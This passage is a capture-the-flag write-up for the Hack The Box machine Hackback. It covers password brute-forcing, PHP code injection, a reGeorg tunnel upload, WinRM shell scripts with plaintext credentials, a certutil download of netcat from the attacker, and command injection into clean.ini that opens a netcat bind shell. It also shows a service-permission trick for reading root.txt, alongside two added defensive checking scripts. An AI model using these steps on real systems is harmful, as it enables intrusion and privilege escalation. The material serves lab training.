But I got Wrong secret key!, which is expected because I set the password to test. I used wfuzz again with darkweb2017-top10000.txt from seclists to bruteforce the password, which happened to be a very easy one :

root@kali:~/Desktop/HTB/boxes/hackback# wfuzz -u 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session=' -w darkweb2017-top10000.txt 

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

*****
* Wfuzz 2.3.4 - The Web Fuzzer *
*****

Target: http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session=
Total requests: 10000

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=302 0 L 3 W 17 Ch "123456"
000004: C=302 0 L 3 W 17 Ch "password"
000006: C=302 0 L 3 W 17 Ch "abc123"
000005: C=302 0 L 3 W 17 Ch "qwerty"
000007: C=302 7 L 15 W 197 Ch "12345678"
000008: C=302 0 L 3 W 17 Ch "password1"
000009: C=302 0 L 3 W 17 Ch "1234567"
000010: C=302 0 L 3 W 17 Ch "123123"
000002: C=302 0 L 3 W 17 Ch "123456789"
000003: C=302 0 L 3 W 17 Ch "111111"
000011: C=302 0 L 3 W 17 Ch "1234567890"
000012: C=302 0 L 3 W 17 Ch "000000"
000013: C=302 0 L 3 W 17 Ch "12345"
^C
Finishing pending requests...

12345678 gave a different response length so it’s probably the password :

root@kali:~/Desktop/HTB/boxes/hackback# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
Array
(
[0] => .
[1] => ..
[2] => 7cb114055494cb503306a0edd1ad1d398f6fb18e28a7a62883c24fd8ab34f66b.log
[3] => e691d0d9c19785cf4c5ab50375c10d83130f175f7f89ebd1899eee6a7aab0dd7.log
)

Yes, it worked. I added my PHPSESSID cookie with the -b option and I also added it to &session=, because some stuff didn't work without including the session cookie.
list showed us some logs. I tried the other actions: exec said Missing command but I couldn't make it execute anything; init didn't output anything, but most likely it's doing something that doesn't produce any output; show also didn't result in any output, but we will make it do so soon.

Gophish

Let’s take a look at the full nmap scan :
nmap -T5 -p- hackback.htb --max-retries 1

There's a third port: 64831. I scanned that port with nmap :
nmap -sV -sT -sC -p 64831 hackback.htb

It’s https. I went there and it was gophish :

Gophish is a powerful, open-source phishing framework that makes it easy to test your organization’s exposure to phishing. -getgophish.com

I tried to login with the default credentials : admin : gophish and it worked :

It was kinda empty but I found some email templates for Facebook, HackTheBox, PayPal and Twitter.

So there are phishing sites somewhere for these services, and now we can understand what's happening in the secret path: it's an endpoint that shows the data collected by the phishing sites. I created a small list to search for the HackTheBox phishing site :

hackthebox
hacktheboxeu
hackthebox.eu
htb
www.hackthebox
www.hacktheboxeu
www.hackthebox.eu
www.htb

Then I used wfuzz :

root@kali:~/Desktop/HTB/boxes/hackback# wfuzz -c -w list.txt -H "HOST: FUZZ.htb" http://10.10.10.128

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

*****
* Wfuzz 2.3.4 - The Web Fuzzer *
*****

Target: http://10.10.10.128/
Total requests: 9

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 33 L 54 W 614 Ch "hackthebox"
000005: C=200 102 L 345 W 4110 Ch "www.hackthebox"
000008: C=200 33 L 54 W 614 Ch "www.htb"
000009: C=400 6 L 26 W 334 Ch ""
000006: C=200 33 L 54 W 614 Ch "www.hacktheboxeu"
000007: C=200 33 L 54 W 614 Ch "www.hackthebox.eu"
000002: C=200 33 L 54 W 614 Ch "hacktheboxeu"
000003: C=200 33 L 54 W 614 Ch "hackthebox.eu"
000004: C=200 33 L 54 W 614 Ch "htb"

Total time: 0.492524
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 18.27319

www.hackthebox gave a different response length so it’s the right one. I added it to /etc/hosts :

http://www.hackthebox.htb :

Just a fake Hack The Box login page. I entered test credentials :

Then I checked the secret path again and did list :

The logs increased by one. I did show and found the credentials I just sent :

root@kali:~/Desktop/HTB/boxes/hackback# curl -b "PHPSESSID=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739'
[05 July 2019, 04:49:52 PM] 10.10.xx.xx - Username: test, Password: test

PHP Code Injection, Uploading Tunnel

With a functionality like this, there might be some injection somewhere. After some attempts I tried php code and it was executed :

root@kali:~/Desktop/HTB/boxes/hackback# curl -b "PHPSESSID=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739'
[05 July 2019, 04:49:52 PM] 10.10.xx.xx - Username: test, Password: test
[05 July 2019, 05:00:20 PM] 10.10.xx.xx - Username: , Password: whatever

The username is empty instead of printing the text I sent, which means that it got executed as PHP. However, all the functions we would use to get RCE, like exec and system, are disabled, so … no, we won't have a shell now.
I wanted to list the files in the current directory so I used the scandir() function :

<?php print_r(scandir('.')); ?>

root@kali:~/Desktop/HTB/boxes/hackback# curl -b "PHPSESSID=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739'
[05 July 2019, 05:06:37 PM] 10.10.xx.xx - Username: Array
(
[0] => .
[1] => ..
[2] => index.html
[3] => webadmin.php
)
, Password: whatever

I went up one directory :

<?php print_r(scandir('..')); ?>

[0] => .
[1] => ..
[2] => 2bb6916122f1da34dcd916421e531578
[3] => App_Data
[4] => aspnet_client
[5] => css
[6] => img
[7] => index.php
[8] => js
[9] => logs
[10] => web.config
[11] => web.config.old

web.config and web.config.old look interesting. I checked them and in web.config.old I found some credentials. I used the file_get_contents() function :
<?php echo file_get_contents('../web.config.old'); ?>

web.config.old :

<configuration>
  <system.webServer>
    <authentication mode="Windows">
      <identity impersonate="true"
                userName="simple"
                password="ZonoProprioZomaro:-("/>
    </authentication>
    <directoryBrowse enabled="false" showFlags="None" />
  </system.webServer>
</configuration>

Credentials : simple : ZonoProprioZomaro:-(. However, there was nowhere to use these credentials yet. I went back to port 6666 and ran the netstat command; it showed that WinRM was listening internally (the entry below is a loopback connection to port 5985) :

"CimInstanceProperties":  [
"Caption",
"Description",
"ElementName",
"InstanceID = \"::1??49852??::1??5985\"",
"CommunicationStatus",
"DetailedStatus",
"HealthState",
"InstallDate",
"Name",
"OperatingStatus",
"OperationalStatus",
"PrimaryStatus",
"Status",
"StatusDescriptions",
"AvailableRequestedStates",
"EnabledDefault = 2",
"EnabledState",
"OtherEnabledState",
"RequestedState = 5",
"TimeOfLastStateChange",
"TransitioningToState = 12",
"AggregationBehavior",
"Directionality",
"CreationTime = 12/31/1600 4:00:00 PM",
"LocalAddress = \"::1\"",
"LocalPort = 49852",
"OwningProcess = 0",
"AppliedSetting = 6",
"OffloadState = 0",
"RemoteAddress = \"::1\"",
"RemotePort = 5985",
"State = 11"
],

So we need a proxy running on the box itself that lets us reach WinRM from outside. Luckily there is reGeorgSocksProxy.
I downloaded tunnel.aspx, base64-encoded it, then uploaded it with file_put_contents() and base64_decode() :

<?php file_put_contents("tunnel.aspx",base64_decode("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")); ?>


Then I checked the tunnel :

Great !

Running the Proxy Server, Shell as simple

The first thing to do is to configure proxychains to use whichever port we like; I used 8888 :
/etc/proxychains.conf :

Then I used reGeorgSocksProxy.py and gave it the port and the path :

python reGeorgSocksProxy.py -p 8888 -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx


Now we can connect as simple. I used Alamot’s winrm ruby shell :

#!/usr/bin/ruby
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.128:5985/wsman',
  transport: :ssl,
  user: 'simple',
  password: 'ZonoProprioZomaro:-(',
  :no_ssl_peer_verification => true
)

command = ""

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build the prompt on the remote side: "PS user@host dir> "
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = STDIN.gets
    # Run the typed command and stream stdout/stderr back as they arrive
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end


And … no flag !

clean.ini, Shell as hacker

I checked c:\ and found a strange directory called util :

c:\util:

PS hackback\simple@HACKBACK C:\> cd util
PS hackback\simple@HACKBACK util> ls

    Directory: C:\util

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/14/2018   3:30 PM                PingCastle
-a----         3/8/2007  12:12 AM         139264 Fping.exe
-a----        3/29/2017   7:46 AM         312832 kirbikator.exe
-a----       12/14/2018   3:42 PM           1404 ms.hta
-a----        2/29/2016  12:04 PM         359336 PSCP.EXE
-a----        2/29/2016  12:04 PM         367528 PSFTP.EXE
-a----         5/4/2018  12:21 PM          23552 RawCap.exe

However, there was also a hidden directory, which shows up with dir -force :

PS hackback\simple@HACKBACK util> dir -force

    Directory: C:\util

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/14/2018   3:30 PM                PingCastle
d--h--       12/21/2018   6:21 AM                scripts
-a----         3/8/2007  12:12 AM         139264 Fping.exe
-a----        3/29/2017   7:46 AM         312832 kirbikator.exe
-a----       12/14/2018   3:42 PM           1404 ms.hta
-a----        2/29/2016  12:04 PM         359336 PSCP.EXE
-a----        2/29/2016  12:04 PM         367528 PSFTP.EXE
-a----         5/4/2018  12:21 PM          23552 RawCap.exe

A new directory appeared : scripts. Looking in that directory :

PS hackback\simple@HACKBACK util> cd scripts
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
Could not find item C:\util\scripts.
At line:1 char:56
+ ... join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name), ...
+                                                          ~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\util\scripts:String) [Get-Item], IOException
    + FullyQualifiedErrorId : ItemNotFound,Microsoft.PowerShell.Commands.GetItemCommand
PS hackback\simple@HACKBACK > ls

    Directory: C:\util\scripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/13/2018   2:54 PM                spool
-a----       12/21/2018   5:44 AM             84 backup.bat
-a----         7/5/2019   5:34 PM             39 batch.log
-a----         7/5/2019   6:07 PM            135 clean.ini
-a----        12/8/2018   9:17 AM           1232 dellog.ps1
-a----         7/5/2019   5:34 PM             36 log.txt

Without going too much into the rabbit holes and failed attempts, let’s check clean.ini :

PS hackback\simple@HACKBACK > type clean.ini
[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt
Directory=c:\inetpub\logs\logfiles

Obviously it gets processed from time to time, and it’s the only thing in that directory that simple can write to. We can inject commands into the LogFile value, which means whichever user processes the file will execute our commands. I tried to upload nc.exe with certutil, but :

PS hackback\simple@HACKBACK > certutil -urlcache -split -f http://10.10.xx.xx/nc64.exe C:\windows\system32\spool\drivers\color\nc.exe
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
At line:1 char:1
+ certutil -urlcache -split -f http://10.10.xx.xx/nc64.exe C:\windows\s ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Expected. I closed that WinRM session and switched to Alamot’s other WinRM shell, which has upload and download capabilities :

#!/usr/bin/ruby

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt

conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.128:5985/wsman',
  user: 'simple',
  password: 'ZonoProprioZomaro:-(',
)

file_manager = WinRM::FS::FileManager.new(conn)


# Split a command line into arguments, keeping quoted strings together
# and stripping the surrounding quotes.
class String
  def tokenize
    self.
      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select {|s| not s.empty? }.
      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
  end
end


command = ""

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build the prompt on the remote side: "PS user@host dir> "
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = STDIN.gets
    if command.start_with?('UPLOAD') then
      upload_command = command.tokenize
      print("Uploading " + upload_command[1] + " to " + upload_command[2])
      # Transfer the file over the existing WinRM connection
      file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end
    if command.start_with?('DOWNLOAD') then
      download_command = command.tokenize
      print("Downloading " + download_command[1] + " to " + download_command[2])
      file_manager.download(download_command[1], download_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
        puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
      end
      command = "echo `nOK`n"
    end

    output = shell.run(command) do |stdout, stderr|
      STDOUT.print(stdout)
      STDERR.print(stderr)
    end
  end
  puts("Exiting with code #{output.exitcode}")
end

Then I uploaded nc.exe to C:\windows\system32\spool\drivers\color\ (a writable location that the default AppLocker rules allow, so it bypasses AppLocker) :

root@kali:~/Desktop/HTB/boxes/hackback# proxychains ./winrm2.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
PS hackback\simple@HACKBACK Documents> UPLOAD /root/Desktop/HTB/boxes/hackback/nc.exe C:\windows\system32\spool\drivers\color\nc.exe
Uploading /root/Desktop/HTB/boxes/hackback/nc.exe to C:\windows\system32\spool\drivers\color\nc.exe|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
26892 bytes of 51488 bytes copied
51488 bytes of 51488 bytes copied

OK
PS hackback\simple@HACKBACK Documents>

After that I used simple echo commands to rewrite clean.ini. It should look like this :

[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe
Directory=c:\inetpub\logs\logfiles

This way we can get a bind shell.

PS C:\util\scripts> echo [Main] > C:\util\scripts\clean.ini
echo [Main] > C:\util\scripts\clean.ini
PS C:\util\scripts> echo LifeTime=100 >> C:\util\scripts\clean.ini
echo LifeTime=100 >> C:\util\scripts\clean.ini
PS C:\util\scripts> echo "LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe" >> C:\util\scripts\clean.ini
echo "LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe" >> C:\util\scripts\clean.ini
PS C:\util\scripts> echo "Directory=c:\inetpub\logs\logfiles" >> C:\util\scripts\clean.ini
echo "Directory=c:\inetpub\logs\logfiles" >> C:\util\scripts\clean.ini
PS C:\util\scripts> cat clean.ini
cat clean.ini
[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe Directory=c:\inetpub\logs\logfiles
PS C:\util\scripts>

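As an added defender’s-eye example (not code from the box or from this write-up), here is the check a script consuming clean.ini could run before using any value: it requires LogFile and Directory to be plain Windows paths and reports the extra command that a value like the rewritten one above would hand to cmd.exe. The two INI samples are copied from this section; the path policy is my own assumption.

```python
import configparser
import re

# Samples copied from the write-up: clean.ini as found on the box, and the rewritten one.
CLEAN_INI = r"""[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt
Directory=c:\inetpub\logs\logfiles
"""
POISONED_INI = r"""[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe
Directory=c:\inetpub\logs\logfiles
"""

# Assumed policy: drive letter, then segments free of characters NTFS forbids in
# names and of cmd.exe metacharacters (& | < > ^ ( ) % ! "). Spaces are allowed.
PLAIN_PATH = re.compile(r'^[A-Za-z]:\\(?:[^\\/:*?"<>|&^()%!]+\\)*[^\\/:*?"<>|&^()%!]+$')
# cmd.exe command separators; whatever follows the first one is an extra command.
CMD_SEPARATORS = re.compile(r'\s*(?:&&|\|\||&|\|)\s*')
EXPECTED_KEYS = {"lifetime", "logfile", "directory"}  # configparser lowercases keys


def injected_commands(value):
    """Return the extra commands cmd.exe would run if `value` were used unquoted."""
    return CMD_SEPARATORS.split(value)[1:]


def check_clean_ini(text):
    """Return {key: reason} for every value that must not reach a shell; {} means clean."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    findings = {}
    if parser.sections() != ["Main"]:
        return {"sections": "expected only [Main], got %r" % parser.sections()}
    main = parser["Main"]
    for key in sorted(set(main) - EXPECTED_KEYS):
        findings[key] = "unexpected key"
    if not main.get("lifetime", "").isdigit():
        findings["lifetime"] = "must be a non-negative integer"
    for key in ("logfile", "directory"):
        value = main.get(key, "")
        if not PLAIN_PATH.match(value):
            findings[key] = "not a plain Windows path; extra commands: %r" % injected_commands(value)
    return findings


if __name__ == "__main__":
    print("original:", check_clean_ini(CLEAN_INI))     # {}
    print("rewritten:", check_clean_ini(POISONED_INI))  # flags logfile
```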
After some time the listener starts and we can connect to port 1338 through the proxy :

Finally we owned user !

UserLogger, Filesystem Access as System, Root Flag

After getting a shell as hacker I did my regular Windows enumeration. One thing I wanted to check was the services; I remembered the services list I got from port 6666, so I went through that.
I noticed a strange service called UserLogger :

"name":  "UserLogger",
"startname": "LocalSystem",
"displayname": "User Logger",
"status": "OK"

So I checked the entry of that service in the registry :

C:\>reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ c:\windows\system32\UserLogger.exe
ObjectName REG_SZ LocalSystem
DisplayName REG_SZ User Logger
Description REG_SZ This service is responsible for logging user activity

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger\Security

Description says it’s responsible for logging user activity. I tried to start that service as hacker :

C:\Windows\system32>sc start userlogger
sc start userlogger

SERVICE_NAME: userlogger
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1368
FLAGS :

hacker was allowed to start and stop the service, so I looked into it more and tested it. I created a test file called test.txt, then started the service with the file as a parameter : sc start userlogger test.txt. It created a new file called test.txt.log :

C:\Users\hacker\Documents>type test.txt.log
type test.txt.log

Logfile specified!
Service is starting
Service is running

Nothing interesting. However, when I checked the permissions of that file :

C:\Users\hacker\Documents>cacls C:\Users\hacker\Documents\test.txt.log
cacls C:\Users\hacker\Documents\test.txt.log

C:\Users\hacker\Documents\test.txt.log Everyone: F

Everyone has full control (F) over it, so it’s readable by everyone. This means we can use this service to read anything we don’t otherwise have access to. But how, when it adds .log after the file name ?
Since Windows doesn’t accept : in file names, we can try to read root.txt like this : sc start userlogger C:\users\administrator\desktop\root.txt:
When it tries to append .log, everything after the : is dropped and the new permissions are applied to root.txt itself :

PS C:\> cmd /c "sc start userlogger 'c:\users\administrator\desktop\root.txt:'"
cmd /c "sc start userlogger 'c:\users\administrator\desktop\root.txt:'"

SERVICE_NAME: userlogger
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1368
FLAGS :

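Why the trailing colon works, and the check the service was missing, as an added example (not UserLogger’s real code, which the write-up never shows): the model below appends .log the way the service was observed to, then splits the result the way NTFS does, where a colon after the drive letter introduces an alternate data stream. root.txt: plus .log therefore names the stream .log on root.txt, so the permissions land on root.txt itself. The allowed-root policy in is_safe_log_argument is my assumption.

```python
import ntpath

LOG_SUFFIX = ".log"  # observed behaviour: the service appends .log to its argument


def split_ntfs_stream(path):
    """Split a Windows path into (file, stream). NTFS treats a colon after the
    drive specifier as the start of an alternate data stream (file.txt:stream)."""
    drive, rest = ntpath.splitdrive(path)
    if ":" in rest:
        file_part, stream = rest.split(":", 1)
        return drive + file_part, stream
    return path, None


def derive_log_target(requested):
    """Model of the service: append .log, then resolve what NTFS would actually open."""
    return split_ntfs_stream(requested + LOG_SUFFIX)


def is_safe_log_argument(requested, allowed_root):
    """Hardened check (assumed policy): the derived log file must be a plain file,
    not a stream, and must stay under allowed_root after normalisation."""
    file_part, stream = derive_log_target(requested)
    if stream is not None:
        return False
    target = ntpath.normcase(ntpath.normpath(ntpath.join(allowed_root, file_part)))
    root = ntpath.normcase(ntpath.normpath(allowed_root))
    return target.startswith(root + "\\")


if __name__ == "__main__":
    docs = r"C:\Users\hacker\Documents"
    for arg in (r"test.txt", r"c:\users\administrator\desktop\root.txt:"):
        print(arg, "->", derive_log_target(arg), "safe:", is_safe_log_argument(arg, docs))
    # The final read in the write-up names a stream explicitly:
    print(split_ntfs_stream(r"c:\users\administrator\desktop\root.txt:flag.txt"))
```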

It worked and we can read root.txt. But what is this ? A troll ?
Just like on Bighead, I suspected it had an alternate data stream. Without using streams.exe I tried a few guesses, and one of them worked :

cat c:\users\administrator\desktop\root.txt:flag.txt


And we owned root !
That’s it, feedback is appreciated !
Don’t forget to read the previous write-ups, tweet about this write-up if you liked it, and follow me on Twitter @Ahm3d_H3sham
Thanks for reading.
